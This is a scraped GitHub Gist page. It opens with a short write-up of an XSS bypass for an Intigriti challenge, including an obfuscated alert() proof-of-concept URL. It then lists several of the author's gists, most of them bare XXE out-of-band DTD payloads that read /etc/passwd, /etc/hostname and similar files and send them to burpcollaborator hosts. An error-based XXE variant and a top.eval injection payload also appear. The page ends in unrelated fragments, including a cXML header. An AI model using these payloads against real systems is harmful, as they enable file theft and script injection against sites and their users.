Skip to content

Instantly share code, notes, and snippets.

I noticed that color Parameter can contain any chars which this is useful to get out of the scope of variable color=" , but it's limited it reflect only 3 chars

And because the value of nickname parameter is being reflect after the color we can benefit from that by making anything after color as comment until we reach the value of the nickname parameter color="/*&nickname=*/

And then we can use , to add our malicious code with window.location but the application convert location word to ( ͡° ͜ʖ ͡°) , There's a way to bypass that through use escaped unicode for a specific char in location word which will be converted to the origin format by the Javascript itself ( because () %60 and some other chars are blocked so location is better choice )

Unfortunately the double quotes and single quotes and %60 are blocked by the application so we cannot use them to assign our host as a value to location but fortunately in the javascript /Anything/ is consider as "/anything/" so we assign our host to location

alert() POC :


https://challenge-0521.intigriti.io/captcha.php?c=[][[e%2b[]][0][5]%2b[e%2b[]][0][1]%2b[e%2b[]][0][25]%2b[e%2b[]][0][18]%2b[e%2b[]][0][26]%2b[e%2b[]][0][16]%2b[0[0]%2b[]][0][0]%2b[e%2b[]][0][5]%2b[e%2b[]][0][26]%2b[e%2b[]][0][14]%2b[e%2b[]][0][16]][[e%2b[]][0][5]%2b[e%2b[]][0][1]%2b[e%2b[]][0][25]%2b[e%2b[]][0][18]%2b[e%2b[]][0][26]%2b[e%2b[]][0][16]%2b[0[0]%2b[]][0][0]%2b[e%2b[]][0][5]%2b[e%2b[]][0][26]%2b[e%2b[]][0][14]%2b[e%2b[]][0][16]]`$${[%2b/3/%2b[]][0][1]%2b[e%2b[]][0][21]%2b[e%2b[]][0][22]%2b[e%2b[]][0][16]%2b[e%2b[]][0][26]%2b[[][[0[0]%2b[]][0][4]%2b[0[0]%2b[]][0][5]%2b[0[0]%2b[]][0][6]%2b[0[0]%2b[]][0][8]]%2b[]][0][13]%2b[[][[0[0]%2b[]][0][4]%2b[0[0]%2b[]][0][5]%2b[0[0]%2b[]][0][6]%2b[0[0]%2b[]][0][8]]%2b[]][0][14]}$```

Smuggle more data with window.name and execute it with eval POC :

@myuyu
myuyu / s.json
Created November 28, 2021 21:06
{
"swagger": "2.0",
@myuyu
myuyu / xx.dtd
Last active February 15, 2022 15:55
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://h1j4pfr9fkitxwq79j5wuzkaa1gy4n.burpcollaborator.net/POCCCCC?%file;'>">
%all;
@myuyu
myuyu / dddd.dtd
Last active February 15, 2022 16:01
<!ENTITY % file SYSTEM "file:///etc/debian_version">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://h1j4pfr9fkitxwq79j5wuzkaa1gy4n.burpcollaborator.net/POCCCCC?%file;'>">
%all;
@myuyu
myuyu / p.dtd
Last active February 24, 2022 07:26
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://w2zbslin91rjwptoh88kuo47jypzdo.burpcollaborator.net/?%file;'>">
%all;
<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://rjee7p9jxu03f68hrtn6c92ksbycm1.burpcollaborator.net?%file;'>">
%all;
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
@myuyu
myuyu / x.js
Last active April 12, 2024 14:25
top.eval('alert(document.domain)');
<?xml version="1.0" encoding="UTF-8"?>
<!--
For cXML license agreement information, please see
http://www.cxml.org/home/license.asp
$Id: //ariba/specs/cXML/Common.mod#16 $
-->
<!--
A few character entities the XML recommendation says should be defined